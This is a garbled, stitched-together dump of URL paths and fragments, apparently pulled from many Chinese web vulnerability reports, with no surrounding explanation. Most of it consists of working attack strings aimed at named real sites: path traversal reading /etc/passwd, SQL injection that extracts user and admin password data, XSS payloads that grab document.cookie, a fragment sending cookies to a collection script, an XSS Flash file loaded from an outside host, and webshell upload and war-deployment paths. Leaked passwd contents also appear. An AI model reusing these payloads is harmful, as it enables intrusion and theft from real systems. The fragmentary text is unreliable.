/var/empty/sshd:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:94:94:Distcache:/:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin x:67:67:Webalizer:/var/www/usage:/sbin/nologin x:23:23::/var/spool/squid:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:25:25:Named:/var/named:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:86:86:Sabayon /home/sabayon:/sbin/nologin x:501:600:websphere_user:/opt/Websph:/bin/bash x:701:700:manager:/home/wangww:/bin/bash /scm/download.jsp?filename=..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2fetc%2fpasswd x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:81:81:System /:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:94:94:Distcache:/:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin 
x:67:67:Webalizer:/var/www/usage:/sbin/nologin x:23:23::/var/spool/squid:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:25:25:Named:/var/named:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:86:86:Sabayon /home/sabayon:/sbin/nologin x:33:6:Amanda /var/lib/amanda:/bin/bash x:89:89::/var/spool/postfix:/sbin/nologin x:41:41:GNU /usr/lib/mailman:/sbin/nologin x:92:92:Quagga /var/run/quagga:/sbin/nologin x:93:93::/var/spool/exim:/sbin/nologin x:98:98::/home/ident:/sbin/nologin x:73:73::/etc/privoxy:/sbin/nologin x:75:75:radvd /:/sbin/nologin x:55:55:LDAP /var/lib/ldap:/bin/false x:100:103:UUID /var/lib/libuuid:/sbin/nologin x:76:12:Cyrus /var/lib/imap:/bin/bash x:95:95:radiusd /:/bin/false x:66:65:tog-pegasus /var/lib/Pegasus:/sbin/nologin x:500:500:wangww:/home/wangww:/bin/bash x:501:600:Websphere:/opt/WebsPhere:/bin/bash x:502:502::/home/wsadmin:/bin/bash /rest/2.0/pim/contacts?method=iterator&limit=10000&app_id=20&ignore_error=1&callback=xx /qzone/app/blog/v6/script/content_gridsblog.js /cgi-bin/blognew/add_blog?ref=qzone&g_tk=1129658366 /shared/index.php?del_id=1787(需登录) /search?hl=zh-CN&newwindow=1&safe=strict&q=site%3A7daysinn.cn+filetype%3Axls&btnG=Google+%E6%90%9C%E7%B4%A2 /Attachment/File/type2/20125/4%E6%9C%88%E4%BB%BD[%E7%9F%B3%E5%AE%B6%E5%BA%84%E6%AD%A3%E5%AE%9A%E5%BA%9C%E8%A5%BF%E8%A1%97%E5%BA%97]%E9%93%B6%E8%A1%8C%E6%98%8E%E7%BB%86%E5%B8%902012513108142913.xls //m.php?a=show&id=29805&m=../../../../../../../../../../etc/passwd%00.jpg&s=bc98bcd5ae717f1aa7a4d6082a8e019f /topicLab/index.php /search.php?stype=search_info&channelid=&q=%22%3E%3CIMG+SRC%3DJaVaScRiPt%3Aalert%28document.cookie%29%3E /?m=archives&a=serach&title=%22%3E%3CIMG+SRC%3DJaVaScRiPt%3Aalert%28document.cookie%29%3E&type=0 /rssFeed.php?id=1105 / / /domainLogin.do?method=yidabaDomain&domainName=[目标域名]&md5=[域名管理密码md5值 /download.aspx?file=xxx.xxx的链接,下载一些文件,包括网站配置文件,从配置文件中又可以获取到农行交易记录 qzs.qq.com swf /music/qzone/qzone_tv_player.swf 
/music/qzone/qzone_tv_player.swf?a=【某个符号】 /music/qzone/qzone_tv_player.swf?a= /music/qzone/qzone_tv_player.swf?a= qzs.qq.com swf /qzone/client/photo/swf/CustomSlideShow.swf?bg=外部图片或FLASH /qzone/client/photo/swf/CustomSlideShow.swf?a=}&bg=http://xsst.sinaapp.com/Xss.swf /Xss.swf又触发了对src属性的判断规则。 /qzone/client/photo/swf/CustomSlideShow.swf?a=}&bg=http://xsst.sinaapp.com/Xss.swf /member/reg/chnreg.shtml / /ckfinder/ckfinder.html /shuodao/open.php?_a=show_more&type=ht_1 /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/redirect.php?-s /indexaction!login.action / /?spm=a1z10.1.0.36.RJcKkF /login.htm /usermedia/changestate.php?unqid={81B498D6-9071-4E8E-9853-394CBDED0004}&state=3 /root/login.aspx /netbroker/weblogon.action /netbroker/weblogon.action /netbroker/weblogon.action /cgi-bin/php-cgi/html/svpn.php /bugs/wooyun-2010-017323 /upload/ /Images/ /downLoad?fileName=201206191739000041.doc /ids/cn/haier_login.jsp?returnUrl=http://user.haier.com/cn/ /ids/cn/forget_password_mobile.jsp /2012/kongtiao/works.php?works=81 /qzone/app/blog/v6/script/content_templateblog_parser.js block /qzone/space_item/orig/3/87731/module_1.jpg /31303066.mp3| / /helpcenter/xinDownload.do?method=BuzList&t /helpcenter/xinDownload.do?method=BuzList&t /wtt/freeCall800.jsp?account=wtt_2219&extension=32219 /webcall/agi800qyb.php?account=wtt_2219&hotline=400-678-9292&extension=32219&cb_num=电话号码&site=&sourceip=你的ip xsser.me/W6XZPx?1353073324'// /index.php?action=kb&article=2&op=comment /index.php?action=kb&article=22&op=comment /modules/ /modules/KB/admin/article_attach.php /modules/KB/file_d.php?id=xxx /event/haiyou_changbaofang.aspx随便找一个点击"我要预订 /event/SendEmail_byChangBaoFang.aspx?email=machun@htinns.com&hotelid=1022181&roomtype=高低铺 /,无意中点开一看,发现竟然是新浪SAE应用审核平台! 
/meeting/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D /meeting/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D / /userinfo.aspx /brand.aspx /shuma/13072863144713x.shtml /meirong/13058326800136x.shtml center /img.jpg#"><img none 466px;height:700px center /psb?/01d1295e-6c2f-4efd-825e-e15c2a77c787/mPEZeaUmy4PfIqxb9UclFShCdxmBJup1fOa6uKTgL80!/b/dJyTa5cOCQAA&bo=0gG8AgAAAAABAEo!#"><img none 466px;height:700px /qzone/app/blog/v6/script/blog_content.js void(0) /qzone/newblog/v5/script/common.js /dwr/index.html /search.do?keywords=1 /search.do?keywords=1 /search.do?keywords=1 /search.do?keywords=1 /search.do?keywords=1 //search.do?keywords=1 /search.do?keywords=1%3E%3Cscript/src=%22%3C/script%3Ealert%281%29//%22% //search.do?keywords=1 /WEB-INF/web.xml /vhost/vhostAction.do?method=showVhostPage&gcode=60512206765937 /books/index.php?op=modify&back=&book_id=53 //main/admin/css/.svn/entries //.bash_history /info.php /index.php?controller=ucenter&action=order_detail&id=22051 /index.php?controller=ucenter&action=order_detail&id=25907 /zzzsk/zszshh.aspx?id=16858 /autogetarticle/_GetLockPic.php?p=/etc/passwd /autogetarticle/_GetLockPic.php?p=/data/htdocs/www.donews.com/liv_global.php /autogetarticle/_GetLockPic.php?p=/data/htdocs/www.donews.com/liv_libraries/config.php /register.jsp /system/userinfoRegisterAction.action?dom.userpassword&dom.linkemail=dnion@163.com&dom.usercode=dnions /system/userinfoRegisterAction.action?dom.userpassword&dom.linkemail=dnion@163.com&dom.usercode=dnions / / /admin/login.php /download2.php?url=c:\windows\win.ini /xtaskdesc.php?act=jianyi&id=-1 /,用的是ECshop的系统,未及时打上补丁。可以用 / / /Aspx/ManageApp/Blank.aspx这个页面上,但是用burp /account/transaction.do?method=list&endDate=&jyType=&page=&pageNum=&productType=D&type=N%27/**/union/**/select/**/user%28%29,null,null,null,null,null,null,null,null,null,null%23 /account/transaction.do?method=list&endDate=&jyType=&page=&pageNum=&type=N&productType=D%27 
/account/transaction.do?method=list&jyType=&page=&pageNum=&endDate=%27 /account/invoice.do?method=listOpened&endDate=&money=&startDate=&title=%27%20or%20%27%27=%27 /vhost/manager.do?method=listRenewAndUpgrade&beginDate=&domain=&endDate=%27%20and%201=1%20and%20%27%27=%27 /domain/domainAuditManage.do?domainName=&domainTypeSearch=%27%27&from=search&from=search&method=showAllDomainList&rnsStatus=&serviceState=%27%27 /domain/domainAuditManage.do?domainName=&domainTypeSearch=%27%27&from=search&from=search&method=showAllDomainList&rnsStatus=&serviceState=%27%20order%20by%208%23 /domain/domainAuditManage.do?domainName=&from=search&from=search&method=showAllDomainList&domainTypeSearch=%27%20union%20select%201,user%28%29,null,null,null,null,null,null,null%23 /listnews.asp?nid=632 /login.asp /web/Index.action /News_showNews.action?messagekey=54286 /?appid=330051%27%20and%20sleep%282%29%3d%27&host=admin5.com&src=http://bbs.admin5.com/forum.php?mod=viewthread&tid=10112420 /?appid=330051%27%20and%20sleep%281%29%3d%27&host=admin5.com&src=http://bbs.admin5.com/forum.php?mod=viewthread&tid=10112420 /?appid=330051%27%20and%20sleep%280%29%3d%27&host=admin5.com&src=http://bbs.admin5.com/forum.php?mod=viewthread&tid=10112420 /interface/recommend/follow.jsp?act=addfollow&userid=xxxx /api/tw?method=tweet.ice.share&_v=1363755146092¶ms.appId=twitter¶ms.title=¶ms.sourceName=Goodjob!¶ms.type=2¶ms.sourceLink=¶ms.sharedId=xxx¶ms.sharedUserId=xxx /4s8Xf0。 /member/compositionupload.jspx?topicId=40&compositionid=90 //ProductSearch/productsearch2.asp?PackageName=1%27%22&page=2&v_BizID=1717&v_UserLevel=1 / /Auditing/download.jsp?filename=../../Auditing/download.jsp /admin/download.jsp?path=/admin/download.jsp /util/downFile.jsp?fileName=../util/downFile.jsp /jsp/download.jsp?filename=../../../jsp/download.jsp /download.jsp?downadd=../../download.jsp /ghc/editor/down.jsp?path=../../&file=ghc/editor/down.jsp /Admin/Article/FileLoad.aspx?FileName=1.aspx&URL=../../../Admin/Article/FileLoad.aspx 
/representNew/down.jsp?path=../representNew/down.jsp /lm/down.jsp?name=&path=../../lm/down.jsp /ahpcmanage/front/info/information_download.jsp?FileName=../../../ahpcmanage/front/info/information_download.jsp /marry/set_index.php?page=398&action=messageboardlist&userid=118 /rssFeed.php?id=1105 /my_charge_history.xhtml /Help/AboutUs/Introduce.aspx /Shop/List.aspx?Keyword=22 windows /4.asp /comment/admin/login.php /此应用缺陷修改他人信息! /query/server2.asp /hotel/hotel.action?orderNo=&language=zh%5fCN&cssNo=3%5f2&arrivalDate=2013%2d03%2d20&departureDate=2013%2d03%2d21&btnSearch=%67e5%8be2&city=HAS&hotel=AHAA&adult=1&children=0&room=1 /infotable.aspx?topic=%cd%a8%d6%aa%b9%ab%b8%e6 /infoview.aspx?infoid=89 /infoview.aspx?infoid=89 /a.zip /car/ /follow/addfollows /following?cur=1&gid=0 /user/recommend/tweet?msg=%u5251%u5fc3%u679c%u7167%uff0c%u901f%u5ea6%u56f4%u89c2%uff01&uid=1521422610 /user/recommend/tweet?msg=%u5251%u5fc3%u679c%u7167%uff0c%u901f%u5ea6%u56f4%u89c2%uff01http://url.cn/DTqtgI&uid=1521422610 /Manage/CreateMySQL.asp?Url=/Style/memberlogin.asp&PID=9 /introduct.php?id=2 /manager/admin_login.aspx /Customer_Service/CustomerTopicList.aspx /s?wd=%E5%BE%AE%E5%8D%9A%3Cimg+src%3D1+onerror%3Dalert%281%29%3E /s?wd=搜索 /s?wd=搜索 /redirect.php?u=Mjg2MzI3MDE4&return_url=http://dellcqg.renren.com/thanksgiving/ /v_show/id_XNTA5ODEyODQw.html /?origin=50115 /user/modify_password&code=320161&id=196772 /ConInfoParticular.jsp?id=14731 /vecenter/guopeichaxun.aspx /searchdir/RentSearch.aspx?ddlisask=1&ddlispartner=0/user /searchdir/RentSearch.aspx?ddlisask=1&ddlispartner=0/@@version /phpcms/index.php?db-5/gid-xd.html www.linux520.com里面去 Object /Xss.swf,提交数据, /lli.vip/dwr/call/plaincall/BlogBeanNew.addBlogComment.dwr fks_087065080081084067086083081071072087083074083095081070093 number:12979759 ddd i_majia number:12979759 lli.vip %E6%9D%8E%E9%BB%8E true 
reference:c0-e1,blogUserId:reference:c0-e2,blogTitle:reference:c0-e3,content:reference:c0-e4,publisherNickname:reference:c0-e5,publisherEmail:reference:c0-e6,mainComId:reference:c0-e7,replyComId:reference:c0-e8,replyToUserId:reference:c0-e9,replyToUserName:reference:c0-e10,replyToUserNick:reference:c0-e11,synchMiniBlog:reference:c0-e12 false 12979759,blogUserName:"lli.vip",circleId:0,circleName:null,circleUrlName:null,content:"ddd",id:"fks_095066085082084075093080084095085084088068093081083074",ip:"113.205.155.197",ipName:"\u91CD\u5E86 1363878263025,mainComId:"-1",moveFrom:null,popup:false,publishTime:1363878263041,publishTimeStr:"23:04:23",publisherAvatar:0,publisherAvatarUrl:"http://img.bimg.126.net/photo/hmZoNQaqzZALvVp0rE7faA==/0.jpg",publisherEmail:"",publisherId:218104121,publisherName:"majiagege",publisherNickname:"i_majia",publisherUrl:null,replyComId:"-1",replyToUserId:12979759,replyToUserName:"lli.vip",replyToUserNick:"\u674E\u9ECE",shortPublishDateStr:"2013-3-21",spam:0,subComments:s0,synchMiniBlog:true,valid:0 /PlusMinusOneAdmin/look/lookalldd.php?id=1&page=1 /PlusMinusOneAdmin/look/lookuserinfo.php?id=2 /PlusMinusOneManger/ /p/tecshuttle/source/detail?r=62 /include/dialog/select_soft_post.php /plus/mytag_js.php?aid=999 /phpsso_server/?m=admin&c=login&a=init&forward= /phpsso_server/?m=admin&c=login&a=init&forward= /phpsso_server/api.php?op=checkcode&code_len=4&font_size=14&width=84&height=24&font=&font_color=&background= /admin/index.jsp /euair/index.jsp /finance/fundhtml/download.php?id=498425426 /record.php www.net.cn使用dedecms集合之前dede所爆漏洞可以得到管理员的帐号与密码 www.net.cn后台 www.net.cn www.net.cn /userInfoAction!goLoginPage.action /userInfoAction!goLoginPage.action /userInfoAction!goLoginPage.action /AODList.jsp /yao/index.php?m=zbzb&a=rcontent&id=145&type=1 /vip/login.php?m=login&a=login /yao/index.php?m=zbzb&a=rcontent&id=145&type=1 /plan.php?typename=city&cityid=48 www.shopexdrp.cn/plus/search.php?keyword=as&typeArr[111%3D@`\ /,title是MCDM移动设备管理系统 
/jmx-console/,可以看到部署的war;其中已经删除了status,看来还是有一点加固的 /shop_admin/forgot.php / /module/membercenter/membermyorderdetails.jsp?id= /module/membercenter/membermyorderdetails.jsp?id=45808 /module/membercenter/membermyorderupdate.jsp?method=cancle&orderid= /module/membercenter/membermyorderdetails.jsp?id=45830 /module/membercenter/membermyorderupdate.jsp?method=cancle&orderid=45830 /bbs/chuishui/304014777,3.html#51 /stat.aspx /stat.aspx?channelid=00000006-0000-0000-3230-303631323134&date=2013-03-23 /plus/search.php?keyword=as&typeArr[111%3D@`\ / /?action=read&forumid=mom_daugh&threadid=1cgwdnckddv /iForgot/iForgot.html,填写指定的apple /voiceofchina/log_sms_callback.txt /XXXXXX none function(XMLHttpRequest){},success:function(rs) /yao/index.php?m=yyzhaos&a=index&tagid=29 http://data.auto.sina.com.cn/dealer/interface/weiboadv.php?subid= /music/musicbox_v2_1/img/MusicFlash.swf /music/musicbox_v2_1/js/musicblog_player.js这个文件中的initSwfData()函数。从图中不难看出,setSwfSongList的参数数据来自于 /music/photo/singer/ /qzone/newblog/v5/script/common.js /music/photo/singer/ /music/photo/singer/NaN/singerpic_96/../../../../../1.swf&a=_0.jpg /1.swf?a=_0.jpg /qzone/app/controls/attachBar/templatePanel/templatePanel_3.0.swf /qzone/app/controls/attachBar/templatePanel/templatePanel_3.0.swf /get/flashplayer/current/swflash.cab#version=8,0,0,0 D27CDB6E-AE6D-11cf-96B8-444553540000 /music/musicbox_v2_1/img/MusicFlash.swf /13130617.wma|雨人|96/../../../../../qzone/app/controls/attachBar/templatePanel/templatePanel_3.0.swf?facadeId= function() /music/musicbox_v2_1/img/MusicFlash.swf /music/musicbox_v2_1/img/MusicFlash.swf /question/vote_start.php?s_id=39 /media_file001/1103/dongshi/Excellent/005/wg/upload/upfile.asp / /notices/86%20and%201=1 /notices/show/91%20and%201=1 /users/login?redirect_url=http://www.taobaotest.com/jobs/79%df%27 /users/password_reset?username=xxxx%df%27 /tags/jhgvjh;%27%df%27/blogs /pictures/avatars/1083.html /login/Jeecms.do www.huatu.com /payment/log_sms_callback.txt /payment/log_card_callback.txt 
/main.aspx / / /z12345G /save.php?cookie='+encodeURIComponent(JSON.stringify(cookie_dict)) / /Product.aspx?id=760 /jmx-console/,上传war的位置 xsst.sinaapp.com/Xss.swf /Xss.swf xsst.sinaapp.com/Xss.swf /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm,If((1=2),1,(select%20user%20from%20mysql.user))%20desc%23&ordertype=asc /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm,If((1=1),1,(select%20user%20from%20mysql.user))%20desc%23&ordertype=asc /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm&ordertype=,If((1=2),1,(select%20user%20from%20mysql.user)) /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm&ordertype=,If((1=1),1,(select%20user%20from%20mysql.user)) /detail/b2b1900e-56e1-43e0-995e-77852ee6794c /download/b2b1900e-56e1-43e0-995e-77852ee6794c / /space/?userid=48574644 /Default.aspx 19.0 /ActvPhone2.EmUser / /hotelpay-web/hotelTerminal/fnd/searchHotelOrders.htm?memberId=¤tPage=3&pageSize=15&orderStatusCriteria=&howLong=10 /hotelpay-web/myHotelOrder/cancelHotelOrder.htm?hotelOrderNo=V10011XXX /webrecord/config.php /hwyst/question.php?question_id=120817154748 /cosphoto/index.asp?Page=5 /cosphoto/costp.asp?id=1 /2007wallphoto/nei_costp.asp?id=7 /UpLoadPhoto/Big/20133251532859.gif.aspx /vuldb/ssvid-20949 /plus/ad_js.php?aid=9999 /manage/task 12.0 /manage/task /registerValidate.jhtml?mobile=18682054050&password1=123456&option=mobile //phoenix.zhtml?c=250900&p=irol-calendar //phoenix.zhtml?c=250900&p=./irol-calendar //phoenix.zhtml?c=250900&p=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd //phoenix.zhtml?c=250900&p=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc //phoenix.zhtml?c=250900&p=data:text/plain,xxxxx ir.vipshop.com//phoenix.zhtml?c=250900&p=data:text/plain,xxxxx%00 /controler/User.ashx?User=admin&action=login&Pass=12345&Autologin=1 / /images/szbg02.gif/c.php 
/t/follow/create/1893374605 /buy/show.php?id=103&catid=20201003 /storelist.php?catid=2 /phpinfo.php /客户名 /admin /index2.php?user=admin /ajax.php?randhost=uset1364223873400.trace.term.chinacache.com&user=admin /admin/ /admin /admin/ /home/project/hero/admin/ / /Admin/ /admin/ /admin/ /admin/ / /admin/ / /Admin/PostToPTD.aspx /Admin/PostToEBD.aspx / /admin/ / /web2.0/admin/ /bmsweb/ / / /index.php/user/login /admin/login.php /中发现了Fckeditor的test文件 /后面加上了PropTransferTool/DataTransformer.exe.config,然后Enter。。 /bizhi/ /Xss.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000 /project/search.html?catid=&funds=&kw=珠宝&order=funds,if /project/search.html?catid=&funds=&kw=珠宝&order=funds,if /project/search.html?catid=&funds=&kw=珠宝&order=funds,if /BlogList.aspx?un=sheoa /BlogList.aspx?un=sheoa /BlogList.aspx?un=sheoa /toSendMsg.action?destid={目标用户ID}&subject={发出去对方的msg}&content=1 /new/FocusListOp.action?oppId={目标用户ID}&flag=true /new/WhiteListOp.action?oppId={目标用户ID}&flag=true /discuz/plugin.php?id=v63shop:goods&pac=info&gid= /plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+1,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a /plus/search.php?keyword=as&typeArr[111%3D@`\ /kaifu/1 /data/mysql_error_trace.inc /data/mysql_error_trace.inc /config/config_global.php.bak www.tgbus.com /Login.aspx /Index/tours_news_detail?t_to=30371 /Cruise/cruise_company?id=46 /logo.gif',550,375,{img:this /plus/search.php?keyword=as&typeArr[111%3D@`\ /169_ol/login.php /vote/developer_intro.php?ID=90 /vote/developer_intro.php?ID=236 /vote/developer_intro.php?ID=746 /vote/developer_intro.php?ID=2093 
/vote/developer_intro.php?ID=59 /vote/developer_intro.php?ID=1548 /vote/developer_intro.php?ID=827 /vote/developer_intro.php?ID=547 /vote/developer_intro.php?ID=17 /vote/developer_intro.php?ID=1859 /vote/developer_intro.php?ID=768 /vote/developer_intro.php?ID=1494 /vote/developer_intro.php?ID=150029 /vote/developer_intro.php?ID=55 /vote/developer_intro.php?ID=797 /vote/developer_intro.php?ID=111835 /vote/developer_intro.php?ID=687 /vote/developer_intro.php?ID=86 /bizhr/ProjectReport/PlacardInfo.aspx?PlacardID=66 /my/comic/44733 /exam2/ / / / / /,打开一看目测风讯cms, /Member/RetrievePassword.aspx www.lusen.com 19.0 /Member/RetrievePassword.aspx /index.php/default/multi_select/app/shoujihao /index.php/default/multi_select/app/shoujihao /index.php/default/multi_select/app/shoujihao /index.php/default/multi_select/app/shoujihao /news.asp?id=887 /news.asp?id=131 /jwc/news.asp?id=148 /news.asp?id=406 /news.asp?id=&bh=1389 /news.asp?id=511 /NewsShow.asp?id=381 /news.asp?id=448 /news.asp?id=156 /pinpai_detail.php?id=97 /Member/ModifyMobileValidate.aspx 19.0 /Member/ModifyMobileValidate.aspx shenghuo.alipay.com /reg/reg.aspx注册,直接填写信息是过不了的,有各种限制。直接拿python试试 /Aspx/DevApp/Release_MyApps.aspx?KeyS=产品名 /Aspx/DevApp/Release_Upgrade2.aspx?productid=10000 /Aspx/DevApp/Dev_Message_Info.aspx?mid=100000 /mybaijob/resume/photo/set?photo_id=123456&op=icon /index.action /宽带计费系统的演示站。 /Self/LoginAction.action 19.0 /t3/ /netpayment/BaseHttp.dll?PrePayC1 /PayMerchantReturn.axd 19.0 /Pay.axd?t=3C3F6B94351AC96FAD2623F44C10A590 /member/member_cancelOrder.htm?oid=26677 /jmx-console /jmx-console_lancer/,部署cmd.war /server/javascript/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector,擦,打开了~~ /server/javascript/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F,获取webshell的路径 /server/UserFiles/Image/browser.jsp /soap/admin/,没有详细分析,截个图,一起修复了吧 /resetpwd?sn=MzQyMDQwMg==&userId=A 
/resetpwd?sn=MzQyMDQwMw==&userId=B /resetpwd?sn=MzQyMDQwNQ==&userId=A /resetpwd?sn=MzQyMDQwNg==&userId=B /resetpwd?sn=MzQyMDQwMg==&userId=A /resetpwd?sn=MzQyMDQwMw==&userId=B /resetpwd?sn=MzQyMDQwNQ==&userId=A /resetpwd?sn=MzQyMDQwNg==&userId=B /resetpwd?sn=MzQyMDQyMg==&userId=账户C /resetpwd?sn=MzQyMDQyM*==&userId=账户C换成账户D,sn最后一位采用人工猜解的方式进行,先从MzQyMDQyMh开始吧 /resetpwd?sn=MzQyMDQyMh==&userId=账户D /resetpwd?sn=MzQyMDQyMi==&userId=账户D /resetpwd?sn=MzQyMDQyMj==&userId=账户D /resetpwd?sn=MzQyMDQyMw==&userId=账户D.W的时候成功了 /appserver/data/developauth/2012-07-19/173back.jpg shenghuo.alipay.com”,googlehacks www1.xx007.cn无关,如: www1.xx007.cn这种网站使用支付宝做在线交易时的某些过程。 /wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91SDK%E4%B8%8B%E8%BD%BD),仅凭一个appid参数即可初始化SSO机制的调用: hc360.com manage /play/169.html / /setnet/reg/login.asp存在注入漏洞。 / /ifree/console/ /student/console_new/ /student/console/student_info_prop.jsp?student_code=0292618 /,站点有个对某个音乐人或作品进行评价回复同时可以同步到自己的sina微博的功能,此处未校验referer导致; /snake/port/snk_song_comment.php /snake/port/snk_artist_sendComment.php /shownews.asp?id=78,随便一个就能暴库了。 /admin/Main.asp /admin/ /cache/spam/safe_tip3.html?http://www.sqlku.com/&d=sc|qq|&t= alert(1) /qq /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector /UserFiles/File/3.jsp / www.whgjj.org.cn/4.asp??page=1&bank=&wd=xxx&dwzh=xxx&xgrzh=811462118&jgrzh=&grzh=811462118&name=a /body.jsp?CID=0103&DBID=54 /body.jsp?CID=0103&DBID=54 /body.jsp?CID=0103&DBID=54 /body.jsp?CID=0103&DBID=54 /Admin/Error.Asp?msg= 19.0 /user/profile/4ffa6c99e4b0f068ba9e32cf /user/cat?duserId=4ffa6c99e4b0f068ba9e32cf&source=WEIWEN /default.php?m=default&c=shop&a=item&id=70 /user/photo/upload.php /index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=47&url=http%3A%2F%2Fluxury.aili.com%2F2012zt%2Fjewelrydesigner%2F /thread-4388-1-1.html /news/news84 loginfail.htm /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 
/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136’ /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136 /KS_Data/KesionCMS7.mdb /dzwminiweb/common/comment/list/front/Com_list.do www.qq.com /index/?pts=1364491912016 /submit/infopost/?op=close /submit/infopost/?op=close&ids=13374799021446 /netzp/Readdw.asp?dwcis=1简单手工试了一下,发现存在SQL注入 /netzp/Readdw.asp?dwcis=1'and /netzp/Readdw.asp?dwcis=1 /netzp/Readdw.asp?dwcis=1 /netzp/Readdw.asp?dwcis=1 / /a_admin/index.php /gamestore/201303/x.txt /Party.aspx?id=1 /Party.aspx?id=1 /Party.aspx?id=1 /Party.aspx?id=1 /Party.aspx?id=1 www.zhuna.cn 19.0 / /wp/wp-admin/theme-editor.php 19.0 /wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve /wp/wp-admin/theme-editor.php",true /wp.html /RegCompany.aspx注册页面,填写信息! 
/TsDf24 /home#javascript:alert(1) /tech/3016.html /plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00 / www.360shop.com.cn /common/center_db/detail.php?cid=-1%20or%2040%3d38&code=&cpage=1&fc=&from=&hid=&id=201547&mid=&owner=&page=2&tid=34261185&type=2 /common/center_db/list.php?cid=-1%20or%2066%3d64&code=&fc=&from=&hid=&id=201547&mid= /common/center_db/view.php?cid=-1%20or%2083%3d81&code=&cpage=1&fc=&fee=201547&from=&hid=&id=201547&mid=&owner=&tid=34261185&type=2 /plane/jpresult.asp?ddlOrgCity1=PEK%27%20and%201=2%20union%20select%20@@version--&ddlDesCity1=CTU&txtGoDate=2013-04-06 /groupshop/loginNew.action /Operating_315/insert_tab.jsp insert /Operating_315/select_tab.jsp?firstpage=0&lostpage=2 www.556666.com非法站点。 /admin/main.files/com_list.php?id=270 /lpromis /lpromis/ /huawei_ar/sphider/search.php?query= /news_details.php?nid=33 /products.php?cat=2002 /status?full=true /lpromis/MainPage.jsps /bp/manager/ /channel/ /Contact/x.aspx /SOURCE/COMNINFO/fieldlist.aspx?selectindex=1 /SOURCE/COMNINFO/1.aspx /usermedia/viewmedia.php?uid=1 /uploadimage.aspx / utf-8 duapp.com/111.txt duapp.com/111.txt /index.php?do=action&act=setgood&id=3093 